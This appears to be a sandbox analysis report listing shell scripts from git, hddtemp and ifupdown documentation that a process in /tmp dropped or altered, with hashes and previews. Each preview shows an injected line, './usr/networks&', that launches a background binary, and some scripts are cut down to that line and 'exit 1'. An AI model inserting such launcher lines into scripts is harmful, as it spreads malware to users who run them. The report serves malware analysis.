                                                                                                                                Preview: ./usr/networks&.mkdir -p "$PACKDIR" || exit..args="$args $local ${GIT_QUIET:+-q} $no_reuse$extra".names=$(git pack-objects --keep-true-parents --honor-pack-keep --non-empty --all --reflog $args </dev/null "$PACKTMP") ||..exit 1.if [ -z "$names" ]; then..say Nothing new to pack..fi..# Ok we have prepared all new packfiles...# First see if there are packs of the same name and if so.# if we can move them out of the way (this can happen if we.# repacked immediately after packing fully..rollback=.failed=.for name in $names.do..for sfx in pack idx..do...file=pack-$name.$sfx...test -f "$PACKDIR/$file" || continue...rm -f "$PACKDIR/old-$file" &&...mv "$PACKDIR/$file" "$PACKDIR/old-$file" || {....failed=t....break...}...rollback="$rollback $file"..done..test -z "$failed" || break.done..# If renaming failed for any of them, roll the ones we have.# already renamed back to their original names..if test -n "$failed".then..rollback_failure=..for file in $rollback..do...mv "$PACKDIR/old-$file" "$PACK
                                                                                                                                /usr/share/doc/git/contrib/examples/git-reset.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1947
                                                                                                                                Entropy (8bit):5.193786239756587
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:EKf4340DBCBBT0M28AHb/XPNV3avMZDUWaUBMh/:M34iAXDAHb/VVqvL+aB
                                                                                                                                MD5:F1EDF5EE98492845561257661376A072
                                                                                                                                SHA1:67AFEDE1A2AA714F28059BDF693240E3333CA299
                                                                                                                                SHA-256:D3E33026EC306D7E2DAC973B7F75227D42F7CE4F693C15AC2686CDE47CD94EFE
                                                                                                                                SHA-512:754A315184ABACBA1171CC3C152C68C158C76BFF695CDD4ED283E278398AAD8A9C8EBC48E276D879121614DD8589F306674B433281DCBC165062C03C67C2DE51
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&...rev=$(git rev-parse --verify "$1") || exit...shift...break...;;..esac..shift.done..: ${rev=HEAD}.rev=$(git rev-parse --verify $rev^0) || exit..# Skip -- in "git reset HEAD -- foo" and "git reset -- foo"..case "$1" in --) shift ;; esac..# git reset --mixed tree [--] paths... can be used to.# load chosen paths from the tree into the index without.# affecting the working tree or HEAD..if test $# != 0.then..test "$reset_type" = "--mixed" ||...die "Cannot do partial $reset_type reset."...git diff-index --cached $rev -- "$@" |..sed -e 's/^:\([0-7][0-7]*\) [0-7][0-7]* \([0-9a-f][0-9a-f]*\) [0-9a-f][0-9a-f]* [A-Z].\(.*\)$/\1 \2.\3/' |..git update-index --add --remove --index-info || exit..git update-index --refresh..exit.fi..cd_to_toplevel..if test "$reset_type" = "--hard".then..update=-u.fi..# Soft reset does not touch the index file or the working tree.# at all, but requires them in a good order. Other resets reset.# the index file to the tree object we are switching to..i
                                                                                                                                /usr/share/doc/git/contrib/examples/git-resolve.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2433
                                                                                                                                Entropy (8bit):5.07831529192731
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:U3/EzFjkVK7XZvFjMaUHjkwIZjJE0wzFqEBCs5eAK6GKQ6KqKJ6:UcBkwjTCkzZjW0wzFqENZGEzv
                                                                                                                                MD5:71B42464943116BC0925788790C82720
                                                                                                                                SHA1:2158A9166F101D7C06DCE90490CA72FC701F7AC8
                                                                                                                                SHA-256:41E20007FBC984AAA2A69BC91D8A469DF54462BBBD82F41A088BD1B1C4D7236D
                                                                                                                                SHA-512:EDA4CB63C15356D00C46117CF692BD985EC13918E71ACBA5DE48AF0E7EB85CFF35BCE5F47A3731EBDB99A75748F6C5C46F799F480C72E229CCDBCB24161571F4
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..."$GIT_DIR/LAST_MERGE" || exit 1.}..head=$(git rev-parse --verify "$1"^0) &&.merge=$(git rev-parse --verify "$2"^0) &&.merge_name="$2" &&.merge_msg="$3" || usage..#.# The remote name is just used for the message,.# but we do want it..#.if [ -z "$head" -o -z "$merge" -o -z "$merge_msg" ]; then..usage.fi..dropheads.echo $head > "$GIT_DIR"/ORIG_HEAD.echo $merge > "$GIT_DIR"/LAST_MERGE..common=$(git merge-base $head $merge).if [ -z "$common" ]; then..die "Unable to find common commit between" $merge $head.fi..case "$common" in."$merge")..echo "Already up-to-date. Yeeah!"..dropheads..exit 0..;;."$head")..echo "Updating $(git rev-parse --short $head)..$(git rev-parse --short $merge)"..git read-tree -u -m $head $merge || exit 1..git update-ref -m "resolve $merge_name: Fast-forward" \...HEAD "$merge" "$head"..git diff-tree -p $head $merge | git apply --stat..dropheads..exit 0..;;.esac..# We are going to make a new commit..git var GIT_COMMITTER_IDENT >/dev/null || exit..# Find
                                                                                                                                /usr/share/doc/git/contrib/examples/git-revert.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4385
                                                                                                                                Entropy (8bit):5.300590299626365
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:2+PPfMaxvVvXuuDCD1Ei9U6rtmYmu7g6B:2M5B+C2pjmu7g6B
                                                                                                                                MD5:F9578FBB7C7185A72858520B5B398D98
                                                                                                                                SHA1:5306EAE3C817938D8259C3CFEDDFCE861254EF4D
                                                                                                                                SHA-256:2B01D3D05568E7DCBFED31EB95FA2EC5FBCD601959816C9277357D8AD8F0877B
                                                                                                                                SHA-512:357DE625D7724672507DD7BF111A03FA71C99900C701DFC585546D523D303643ABD8B209829A3FA9993BB8E562E8BDC857D832CF2DF5ADCC5D32916A106DA7C9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1 ;;.esac..SUBDIRECTORY_OK=Yes ;# we will cd up.. git-sh-setup.require_work_tree.cd_to_toplevel..no_commit=.xopt=.while case "$#" in 0) break ;; esac.do..case "$1" in..-n|--n|--no|--no-|--no-c|--no-co|--no-com|--no-comm|\.. --no-commi|--no-commit)...no_commit=t...;;..-e|--e|--ed|--edi|--edit)...edit=-e...;;..--n|--no|--no-|--no-e|--no-ed|--no-edi|--no-edit)...edit=...;;..-r)...: no-op ;;..-x|--i-really-want-to-expose-my-private-commit-object-name)...replay=...;;..-X?*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#-X}")"...;;..--strategy-option=*)...xopt="$xopt$(git rev-parse --sq-quote "--${1#--strategy-option=}")"...;;..-X|--strategy-option)...shift...xopt="$xopt$(git rev-parse --sq-quote "--$1")"...;;..-*)...usage...;;..*)...break...;;..esac..shift.done..set_reflog_action "$me"..test "$me,$replay" = "revert,t" && usage..case "$no_commit" in.t)..# We do not intend to commit immediately. We just want to..# merge the differences in...head=$(git-write-tree) ||
                                                                                                                                /usr/share/doc/git/contrib/examples/git-tag.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1972
                                                                                                                                Entropy (8bit):5.222096129300364
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:kVCbAQZic8rYsnYEdGF+CnnMHx+Hh/3CtRTOa3kK8pKlfoU/Z14bLDSkIJsHTAiJ:k70ic8rZbYHh/SbOYF/ZyLDXHTAdC
                                                                                                                                MD5:7E494C753E4F3B80FE7EC6511ECDC764
                                                                                                                                SHA1:B13B4AC59D0DE77616C87B56B75CD7BFE73F5820
                                                                                                                                SHA-256:E9541DF7E22E58496C9E0936DF12AD0EB2B1E1B577F6D36B946F0FC5FD58E373
                                                                                                                                SHA-512:0E542FDDDB9B992C1628BE1BE07169E3C396866513DD97C15E83C20EFDDC0E5ADF9B25D63482A4F93FDD8D2770CD3BEF2DA699AE8CEE062AA3A46F7D33AA35FA
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit $had_error..;;. -v)..shift..tag_name="$1"..tag=$(git show-ref --verify --hash -- "refs/tags/$tag_name") ||...die "Seriously, what tag are you talking about?"..git-verify-tag -v "$tag"..exit $?..;;. -*). usage..;;. *)..break..;;. esac.done..[ -n "$list" ] && exit 0..name="$1".[ "$name" ] || usage.prev=0000000000000000000000000000000000000000.if git show-ref --verify --quiet -- "refs/tags/$name".then. test -n "$force" || die "tag '$name' already exists". prev=$(git rev-parse "refs/tags/$name").fi.shift.git check-ref-format "tags/$name" ||..die "we do not like '$name' as a tag name."..object=$(git rev-parse --verify --default HEAD "$@") || exit 1.type=$(git cat-file -t $object) || exit 1.tagger=$(git var GIT_COMMITTER_IDENT) || exit 1..test -n "$username" ||..username=$(git config user.signingkey) ||..username=$(expr "z$tagger" : 'z\(.*>\)')..trap 'rm -f "$GIT_DIR"/TAG_TMP* "$GIT_DIR"/TAG_FINALMSG "$GIT_DIR"/TAG_EDITMSG' 0..if [ "$annotate" ]
                                                                                                                                /usr/share/doc/git/contrib/examples/git-verify-tag.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):243
                                                                                                                                Entropy (8bit):5.091025781115778
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                                                MD5:BE780CC322587122E892D123BFF726B6
                                                                                                                                SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                                                SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                                                SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):792
                                                                                                                                Entropy (8bit):4.925184193549972
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                                                MD5:895868AC151D9953AD152F77240CF73D
                                                                                                                                SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                                                SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                                                SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):486
                                                                                                                                Entropy (8bit):5.198694046664742
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                                                MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                                                SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                                                SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                                                SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2904
                                                                                                                                Entropy (8bit):5.006955417229927
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                                                MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                                                SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                                                SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                                                SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                                                /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):637
                                                                                                                                Entropy (8bit):4.973192610623575
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                                                MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                                                SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                                                SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                                                SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14967
                                                                                                                                Entropy (8bit):5.111069408805373
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                                                MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                                                SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                                                SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                                                SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                                                /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):822
                                                                                                                                Entropy (8bit):5.456000973546581
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                                                MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                                                SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                                                SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                                                SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):617
                                                                                                                                Entropy (8bit):4.789300168717738
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                                                MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                                                SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                                                SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                                                SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1015
                                                                                                                                Entropy (8bit):4.896629241453442
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                                                MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                                                SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                                                SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                                                SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                                                /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):461
                                                                                                                                Entropy (8bit):5.204671186006819
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                                                MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                                                SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                                                SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                                                SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                                                Process:/tmp/nT7K5GG5km
                                                                                                                                File Type:ASCII text
